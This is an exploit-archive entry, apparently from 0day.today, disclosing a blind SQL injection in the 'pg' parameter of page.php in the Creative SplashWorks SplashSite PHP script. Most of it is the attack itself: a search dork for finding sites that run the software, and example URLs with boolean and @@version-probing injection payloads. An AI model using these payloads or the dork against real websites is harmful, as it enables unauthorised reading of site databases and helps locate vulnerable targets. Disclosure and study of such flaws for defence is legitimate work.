id: 10745
date: 01/31/2010
title: Creative SplashWorks-SplashSite (page.php) Blind Sql Injection
author: AtT4CKxT3rR0r1ST
cves: 

============================================================================
Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability
============================================================================

.:. Script : Creative SplashWorks-SplashSite
.:. Language : php
.:. Bug Type : Blind Sql Injection
.:. Dork : "Website Powered By Creative SplashWorks - SplashSite"

===[ Exploit ]===
 
www.site.com/page.php?pg=18+and+1=1 >>> True
www.site.com/page.php?pg=18+and+1=2 >>> False
 
www.site.com/page.php?pg=18+and+substring(@@version,1,1)=5 >>> True
www.site.com/page.php?pg=18+and+substring(@@version,1,1)=4 >>> False



#  0day.today [2023-03-24]  #